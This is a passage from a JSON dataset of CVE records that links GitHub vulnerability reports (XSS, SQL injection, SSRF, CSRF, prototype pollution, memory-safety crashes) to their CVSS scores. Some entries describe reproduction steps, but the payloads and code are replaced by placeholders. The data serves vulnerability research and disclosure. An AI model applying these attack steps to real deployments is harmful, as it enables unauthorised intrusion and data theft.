        "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/8161",
        "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/8161",
        "Repo_new": "eclipse/jetty.project",
        "Issue_Created_At": "2022-06-13T13:35:36Z",
        "description": "Improve APITAG buffers handling. Jetty version(s NUMBERTAG Description APITAG 's buffers utilization and their pooling should be reviewed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-22123",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1557",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1557",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2021-12-02T14:09:30Z",
        "description": "\u5904\u7406\u540e\u53f0\u5404\u4e2a\u8f93\u5165\u6846\u7684 XSS \u5b89\u5168\u95ee\u9898. What is version of Halo has the issue NUMBERTAG What database are you using? H2 What is your deployment method? Fat Jar Your site address. _No response_ What happened? APITAG APITAG APITAG Relevant log output _No response_ Additional information _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-22124",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1575",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1575",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2021-12-06T12:01:50Z",
        "description": "\u4e0a\u4f20 SVG \u56fe\u7247\u53ef\u80fd\u5f15\u53d1\u7684 XSS NUMBERTAG H2 \u4f7f\u7528\u7684\u54ea\u79cd\u65b9\u5f0f\u90e8\u7f72\uff1f Fat Jar \u5728\u7ebf\u7ad9\u70b9\u5730\u5740 _No response_ \u53d1\u751f\u4e86\u4ec0\u4e48\uff1f SVG \u6587\u4ef6\u5305\u542b JS \u811a\u672c\u53ef\u80fd\u4f1a\u5f15\u53d1\u7684 XSS APITAG SVG \u6587\u4ef6\u793a\u4f8b\uff1a CODETAG \u76f8\u5173\u65e5\u5fd7\u8f93\u51fa _No response_ \u9644\u52a0\u4fe1\u606f _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-22293",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/20237",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/20237",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2022-03-01T13:37:10Z",
        "description": "HTML injection in FILETAG , Dolibarr NUMBERTAG Bug There is a proof of concept for a XSS on FILETAG for Dolibarr NUMBERTAG see URLTAG It would be useful to have a check/ statement if the problem still exist in newer versions, or it is already fixed (and if so, in which version). Environment Version NUMBERTAG Environment OS _No response_ Environment Web server _No response_ Environment PHP _No response_ Environment Database _No response_ Environment URL(s) _No response_ Expected and actual behavior _No response_ Steps to reproduce the behavior _No response_ Attached files _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-22701",
        "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1229",
        "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1229",
        "Repo_new": "partkeepr/partkeepr",
        "Issue_Created_At": "2022-01-04T13:52:52Z",
        "description": "The functionality add attachment to parts allows access to local files.. FILETAG FILETAG System Information APITAG Version NUMBERTAG and NUMBERTAG Operating System: Linux Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-22702",
        "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1230",
        "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1230",
        "Repo_new": "partkeepr/partkeepr",
        "Issue_Created_At": "2022-01-04T14:31:21Z",
        "description": "The functionality add attachment to parts allows access to local ports (SSRF).. FILETAG FILETAG FILETAG System Information APITAG Version NUMBERTAG and NUMBERTAG Operating System: Linux Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-22846",
        "Issue_Url_old": "https://github.com/paulc/dnslib/issues/30",
        "Issue_Url_new": "https://github.com/paulc/dnslib/issues/30",
        "Repo_new": "paulc/dnslib",
        "Issue_Created_At": "2022-01-08T15:35:02Z",
        "description": "Client does not validate DNS transaction id. Hi, dnslib client does not validate DNS transaction id (TXID) as specified in the FILETAG . Attackers can use this to redirect users to their malicious name servers. I know the client created for testing but other projects using dnslib as a dependency might be affected as well. I suggest to add a simple validate: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-22868",
        "Issue_Url_old": "https://github.com/GibbonEdu/core/issues/1594",
        "Issue_Url_new": "https://github.com/gibbonedu/core/issues/1594",
        "Repo_new": "gibbonedu/core",
        "Issue_Created_At": "2022-01-03T03:47:42Z",
        "description": "A Stored Cross Site Scripting (XSS) injection vulnerability exists in Gibbon CMS version APITAG APITAG + VULNERABLE A Stored Cross Site Scripting (XSS) injection vulnerability exists in Gibbon CMS version APITAG . An attacker can inject arbitrary javascripts in PATHTAG APITAG via the \u2018name\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: Gibbon CMS + Version: APITAG + Browser Chrome Describe the bug + The vulnerability is present in the PATHTAG APITAG and can be exploited throuth a POST request via the \u2018name\u2019 parameters. Because of lacking of sanitizer of input data in param name allow inject code javascripts FILETAG FILETAG APITAG Impact + An attacker can send javascripts code through any vulnerable form field to change the design of the website or any information displayed to the user, saving the information persistently on the site (e.g. database). Suggestions + User input should be HTML encoded at any point where it is copied into application responses. All HTML metacharacters, including < > \" ' and =, should be replaced with the corresponding HTML entities (< > etc). To Reproduce APITAG NUMBERTAG After login account admin , you can see admin panel, click timetable admin FILETAG NUMBERTAG You can create a new on record and injection code javascripts into field name as show below FILETAG FILETAG NUMBERTAG As can be seen from the following evidence, the content of the injection was correctly saved on the page (on the database) and executed. FILETAG Screenshots Request: FILETAG Response: FILETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-22880",
        "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3347",
        "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3347",
        "Repo_new": "jeecgboot/jeecg-boot",
        "Issue_Created_At": "2022-01-04T06:28:26Z",
        "description": "SQL injection exists in PATHTAG NUMBERTAG After testing, it is found that the code parameter of PATHTAG interface of jeecg boot has SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a PATHTAG FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG FILETAG FILETAG \u53cb\u60c5\u63d0\u793a\uff08\u4e3a\u4e86\u63d0\u9ad8issue\u5904\u7406\u6548\u7387\uff09\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389; \u8bf7\u81ea\u5df1\u521d\u5224\u95ee\u9898\u63cf\u8ff0\u662f\u5426\u6e05\u695a\uff0c\u662f\u5426\u65b9\u4fbf\u6211\u4eec\u8c03\u67e5\u5904\u7406\uff1b APITAG \u63cf\u8ff0\u8fc7\u4e8e\u7b80\u5355\u6216\u6a21\u7cca\uff0c\u5bfc\u81f4\u65e0\u6cd5\u5904\u7406\u7684\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389\uff1b",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-22881",
        "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3348",
        "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3348",
        "Repo_new": "jeecgboot/jeecg-boot",
        "Issue_Created_At": "2022-01-04T08:36:23Z",
        "description": "SQL injection exists in PATHTAG \u7248\u672c\u53f7\uff1a jeecg boot NUMBERTAG After testing, it is found that the code parameter of PATHTAG interface of jeecg boot has SQL injection Reuse URLTAG After the source code of the project starts the project, click \"custom component\" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a payload: PATHTAG FILETAG or PATHTAG FILETAG Using sqlmap FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG FILETAG FILETAG \u53cb\u60c5\u63d0\u793a\uff08\u4e3a\u4e86\u63d0\u9ad8issue\u5904\u7406\u6548\u7387\uff09\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389; \u8bf7\u81ea\u5df1\u521d\u5224\u95ee\u9898\u63cf\u8ff0\u662f\u5426\u6e05\u695a\uff0c\u662f\u5426\u65b9\u4fbf\u6211\u4eec\u8c03\u67e5\u5904\u7406\uff1b APITAG \u63cf\u8ff0\u8fc7\u4e8e\u7b80\u5355\u6216\u6a21\u7cca\uff0c\u5bfc\u81f4\u65e0\u6cd5\u5904\u7406\u7684\uff0c\u4f1a\u88ab\u76f4\u63a5\u5220\u6389\uff1b",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-22885",
        "Issue_Url_old": "https://github.com/dromara/hutool/issues/2042",
        "Issue_Url_new": "https://github.com/dromara/hutool/issues/2042",
        "Repo_new": "dromara/hutool",
        "Issue_Created_At": "2021-12-26T12:41:33Z",
        "description": "\u9ed8\u8ba4\u7684 APITAG \u4e3a\u4ec0\u4e48\u9009\u62e9 APITAG \u5462\uff1f. \u7248\u672c\u60c5\u51b5 JDK\u7248\u672c\uff1a corretto NUMBERTAG hutool NUMBERTAG hutool APITAG \u4e2d APITAG APITAG \u9ed8\u8ba4\u4f20\u5165\u7684 APITAG \u662f APITAG CODETAG \u67e5\u770b APITAG \u4ee3\u7801\u5982\u4e0b\uff1a CODETAG \u4ece doc \u770b\u5230 APITAG \u662f\u4e00\u79cd fallback \u673a\u5236\uff0c\u5f53\u8981\u8fde\u63a5\u7684 host \u4e0e\u670d\u52a1\u7aef\u8bc1\u4e66 server name \u4e0d\u5339\u914d\u65f6\u624d\u6709\u4f5c\u7528\u3002\u5e76\u4e14 APITAG \u7684\u9ed8\u8ba4\u673a\u5236\u662f\u8fd9\u65f6\u5019\u62d2\u7edd\u6b64\u7c7b\u8bf7\u6c42\u3002\u800c hutool \u5219\u9ed8\u8ba4\u653e\u884c\u6240\u6709\u8fd9\u7c7b\u8bf7\u6c42\u3002 \u5982\u679c\u8c03\u7528 APITAG \u65f6\u624b\u52a8\u4f20\u5165\u4e0a\u9762\u7684 APITAG CODETAG \u4e5f\u4f1a\u8bf7\u6c42\u6210\u529f\u3002\u6309\u6211\u7406\u89e3\u8fd9\u6837\u624d\u662f\u5408\u7406\u7684\uff0c\u5982\u679c\u670d\u52a1\u7aef\u8bc1\u4e66 server name \u4e0e host APITAG APITAG \u7684\u9ed8\u8ba4\u884c\u4e3a\u4f1a\u6709\u5751\uff0chutool \u624d\u53e6\u5916\u6307\u5b9a\u4e86 APITAG \u5462\uff1f \u8c22\u8c22\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-22888",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4848",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4848",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-07T10:36:37Z",
        "description": "Stack overflow in ecma objects (ecma_op_object_find_own). APITAG revision NUMBERTAG URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-22890",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4847",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4847",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-07T08:52:59Z",
        "description": "Assertion 'arguments_type != SCANNER_ARGUMENTS_PRESENT && arguments_type != APITAG in js scanner util (scanner_pop_literal_pool). APITAG revision NUMBERTAG URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-22891",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4871",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4871",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T07:38:01Z",
        "description": "SEGV in ecma_ref_object_inline of ecma gc.c. APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-22892",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4872",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4872",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T07:41:05Z",
        "description": "Assertion 'ecma_is_value_undefined (value) || ecma_is_value_null (value) || ecma_is_value_boolean (value) || ecma_is_value_number (value) || ecma_is_value_string (value) || ecma_is_value_bigint (value) || ecma_is_value_symbol (value) || ecma_is_value_object (value)' failed in ecma helpers APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-22893",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4901",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4901",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-13T09:33:54Z",
        "description": "Stack overflow in APITAG of vm.c. APITAG revision Commit NUMBERTAG bd6 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-22895",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4882",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4882",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T13:20:38Z",
        "description": "Heap buffer overflow in APITAG (ecma helpers conversion.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Another form of testcase Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-22901",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4916",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4916",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-02T19:10:38Z",
        "description": "ICE: Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' failed at PATHTAG APITAG APITAG commit hash APITAG Build platform Ubuntu NUMBERTAG LTS Build steps PATHTAG clean compile flag= fsanitize=address lto=off error message=on profile=es NUMBERTAG subset stack limit NUMBERTAG debug logging=on line info=on poc ERRORTAG assert log ERRORTAG asan log ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-22912",
        "Issue_Url_old": "https://github.com/TooTallNate/plist.js/issues/114",
        "Issue_Url_new": "https://github.com/tootallnate/plist.js/issues/114",
        "Repo_new": "tootallnate/plist.js",
        "Issue_Created_At": "2022-01-06T05:41:28Z",
        "description": "Prototype Pollution using APITAG Hi, There's a prototype pollution in APITAG related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter. ERRORTAG More information about the vulnerability: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-22919",
        "Issue_Url_old": "https://github.com/jdordonezn/CVE-2022-22919/issues/1",
        "Issue_Url_new": "https://github.com/jdordonezn/cve-2022-22919/issues/1",
        "Repo_new": "jdordonezn/CVE-2022-22919",
        "Issue_Created_At": "2022-01-26T19:49:12Z",
        "description": "Open redirect in APITAG APITAG NUMBERTAG APITAG APITAG platform version NUMBERTAG or earlier is vulnerable to open redirection for any authenticated user on the platform. An attacker can send an open redirect to the victim, redirecting them to a phishing or other malicious domain, controlled by the attacker. Payload : FILETAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23047",
        "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/1546",
        "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/1546",
        "Repo_new": "exponentcms/exponent-cms",
        "Issue_Created_At": "2022-01-28T13:28:27Z",
        "description": "Exponent CMS Security Issues. I reported NUMBERTAG ulnerabilities on Exponent NUMBERTAG patch2) using FILETAG but i haven't received any response. Attached below are the links to the tickets, advisories and our responsible disclosure policy respectively. Ticket Stored XSS APITAG URLTAG . Advisory Stored XSS APITAG URLTAG . Ticket File Upload RCE APITAG Extension) URLTAG Advisory File Upload RCE APITAG Extension) URLTAG . Ticket Stored XSS APITAG Agent) URLTAG Advisory Stored XSS APITAG Agent) URLTAG . Security Policy URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-23051",
        "Issue_Url_old": "https://github.com/1modm/petereport/issues/36",
        "Issue_Url_new": "https://github.com/1modm/petereport/issues/36",
        "Repo_new": "1modm/petereport",
        "Issue_Created_At": "2022-02-08T18:57:55Z",
        "description": "Security Issue Stored XSS APITAG Tree). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG allows an authenticated admin user to inject persistent javascript code while adding an APITAG Tree' by modifying the svg_file parameter. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Create a new Report NUMBERTAG Create a new Finding for the Report NUMBERTAG Go to APITAG > APITAG Reports NUMBERTAG Click on APITAG in the last created record NUMBERTAG Go to APITAG Trees NUMBERTAG Click on APITAG Attack Tree NUMBERTAG Select your Finding and click on APITAG and Finish NUMBERTAG Intercept the request and insert javascript code inside the svg_file parameter. APITAG NUMBERTAG If a user visits the attack tree the javascript code will be rendered. Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-23052",
        "Issue_Url_old": "https://github.com/1modm/petereport/issues/34",
        "Issue_Url_new": "https://github.com/1modm/petereport/issues/34",
        "Repo_new": "1modm/petereport",
        "Issue_Created_At": "2022-02-07T20:20:42Z",
        "description": "Security Issue CSRF APITAG user,product,etc). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings in the application. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Create a malicious html file with the following content. CODETAG NUMBERTAG If an authenticated admin visits the malicious url, the user with the correspond id will be deleted Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23094",
        "Issue_Url_old": "https://github.com/libreswan/libreswan/issues/585",
        "Issue_Url_new": "https://github.com/libreswan/libreswan/issues/585",
        "Repo_new": "libreswan/libreswan",
        "Issue_Created_At": "2021-12-21T07:39:17Z",
        "description": "xfrm interface ipsec1 exist after core dump and blocking restart of ipsec service clean. After setting up plutodebug=base, I got the packet which may cause core dump when ike NUMBERTAG is not accept APITAG NUMBERTAG localhost pluto NUMBERTAG received NUMBERTAG bytes from APITAG on eth0 APITAG using UDP Dec NUMBERTAG localhost pluto NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG cc NUMBERTAG d NUMBERTAG c ...............\\ Dec NUMBERTAG localhost pluto NUMBERTAG P.... Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG c NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG e NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG cc ................ Dec NUMBERTAG localhost pluto NUMBERTAG d NUMBERTAG c NUMBERTAG P Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG c NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG c NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG parse ISAKMP Message: Dec NUMBERTAG localhost pluto NUMBERTAG initiator SPI NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG responder SPI NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG next payload type: ISAKMP_NEXT_SA NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG ISAKMP version: ISAKMP Version NUMBERTAG rfc NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG exchange type: ISAKMP_XCHG_IDPROT NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG flags: none NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG Message ID NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG length NUMBERTAG cc) Dec NUMBERTAG localhost pluto NUMBERTAG processing version NUMBERTAG packet with exchange type=ISAKMP_XCHG_IDPROT NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG State DB: IKE NUMBERTAG state not found (find_state_ike NUMBERTAG init) Dec NUMBERTAG localhost pluto NUMBERTAG null state always idle Dec NUMBERTAG localhost pluto NUMBERTAG got payload NUMBERTAG ISAKMP_NEXT_SA) needed NUMBERTAG opt NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG parse ISAKMP Security Association Payload: Dec NUMBERTAG localhost pluto NUMBERTAG next payload type: ISAKMP_NEXT_VID NUMBERTAG d) Dec NUMBERTAG localhost pluto NUMBERTAG length NUMBERTAG c) Dec NUMBERTAG localhost pluto NUMBERTAG DOI: ISAKMP_DOI_IPSEC NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG got payload NUMBERTAG ISAKMP_NEXT_VID) needed NUMBERTAG opt NUMBERTAG Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Main process exited, code=dumped, status NUMBERTAG SEGV Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Failed with result 'core dump'. Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Consumed NUMBERTAG s CPU time. Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Scheduled restart job, restart counter is at NUMBERTAG Dec NUMBERTAG localhost systemd NUMBERTAG Stopped Internet Key Exchange (IKE) Protocol Daemon for APITAG Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Consumed NUMBERTAG s CPU time. Dec NUMBERTAG localhost systemd NUMBERTAG Starting Internet Key Exchange (IKE) Protocol Daemon for APITAG normally after core dump the APITAG service restart by unfortunately the original xfrm interface was not clear and cause below: APITAG NUMBERTAG localhost pluto NUMBERTAG ike NUMBERTAG cp\": conflict ipsec1 already exist cannot support xfrm interface. May be leftover from previous pluto? Dec NUMBERTAG localhost pluto NUMBERTAG ike NUMBERTAG cp\": failed to add connection: ipsec interface NUMBERTAG not supported. device name conflict in APITAG This cause the VPN server not accept any connection request and need manual restart the service. Any workaround?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23316",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/15",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/15",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2022-01-10T07:43:07Z",
